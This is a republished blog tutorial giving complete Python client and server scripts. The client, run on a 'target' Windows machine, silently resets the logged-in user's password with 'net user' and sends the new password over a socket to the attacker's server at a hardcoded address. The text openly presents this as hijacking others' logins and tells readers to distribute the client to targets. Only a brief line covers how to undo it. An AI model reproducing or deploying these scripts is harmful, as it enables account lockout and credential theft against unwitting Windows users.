BestHub
Sign in
Backend Development 5 min read

Hijack Windows Login Passwords with a Python Socket Script

This tutorial shows how to create a Python client‑server pair that randomly generates a new Windows login password on a target machine, sends it over a socket to your server, and demonstrates how to revert the change using built‑in commands.

MaGe Linux Operations
MaGe Linux Operations
MaGe Linux Operations
Hijack Windows Login Passwords with a Python Socket Script

Today we’ll learn how to use a Python script to silently control the login password of Windows computers by generating a random password that only you know.

The solution consists of two parts: a client script that runs on the target machine and a server script that runs on your own computer. First start the server, then distribute the client to the target.

Client script (client.py)

# client.py
import socket  # import required modules
import getpass
import subprocess
import random

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # create socket instance
client.connect(('10.0.0.1', 44444))  # connect to server (adjust IP/port as needed)
user = getpass.getuser()  # get current username
psd = ''  # password variable
for j in range(1, 9):  # generate random digits 1‑9
    m = str(random.randrange(0, 10))
    psd = psd + m
subprocess.Popen(['net', 'User', user, psd])  # set new password locally (like a cmd command)
client.send(psd.encode('utf-8'))  # send password to server
back_msg = client.recv(1024)
client.close()  # close socket
print(psd)  # print password locally for reference

Server script (server.py)

# server.py
import socket  # import socket module

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # create socket
server.bind(('10.0.0.1', 44444))  # bind IP/port
server.listen(5)  # start listening
print('starting....')
conn, addr = server.accept()  # accept connection
print(conn)
print('client addr', addr)
print('ready to recv the passwd...')
client_msg = conn.recv(1024)
print('client passwd changed: %s' % client_msg)
conn.send(client_msg.upper())
conn.close()
server.close()

Run the server script on a Linux machine (preferably in a virtual machine) to wait for incoming passwords. Then run the client script on a Windows machine; it will generate a random password, set it using net user, and transmit it to the server.

After logging out or rebooting, the original password no longer works because it has been changed and the new password has been captured on the server side.

To restore the original password, open a command prompt on the Windows machine and execute net user <your_username> <desired_password>, then press Enter.

This concludes the tutorial. Feel free to leave comments about topics you’d like to see next.

Original Source

Signed-in readers can open the original source through BestHub's protected redirect.

Sign in to view source
Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactadmin@besthub.devand we will review it promptly.

NetworkingWindowsSocketscriptpassword
MaGe Linux Operations
Written by

MaGe Linux Operations

Founded in 2009, MaGe Education is a top Chinese high‑end IT training brand. Its graduates earn 12K+ RMB salaries, and the school has trained tens of thousands of students. It offers high‑pay courses in Linux cloud operations, Python full‑stack, automation, data analysis, AI, and Go high‑concurrency architecture. Thanks to quality courses and a solid reputation, it has talent partnerships with numerous internet firms.

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.

Sign in to comment